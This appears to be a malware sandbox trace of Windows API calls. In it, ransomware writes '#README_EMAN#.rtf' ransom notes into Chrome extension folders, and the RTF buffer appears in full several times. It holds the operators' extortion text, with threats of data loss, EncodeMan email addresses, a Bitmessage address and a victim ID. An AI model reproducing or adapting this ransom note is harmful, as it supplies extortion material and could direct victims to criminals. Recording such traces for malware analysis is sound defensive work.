b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.513] WriteFile (in: hFile=0x2c8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.514] CloseHandle (hObject=0x2c8) returned 1 [0272.514] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\#readme_eman#.rtf")) returned 0xffffffff [0272.514] GetLastError () returned 0x2 [0272.514] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0272.515] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.515] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.515] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 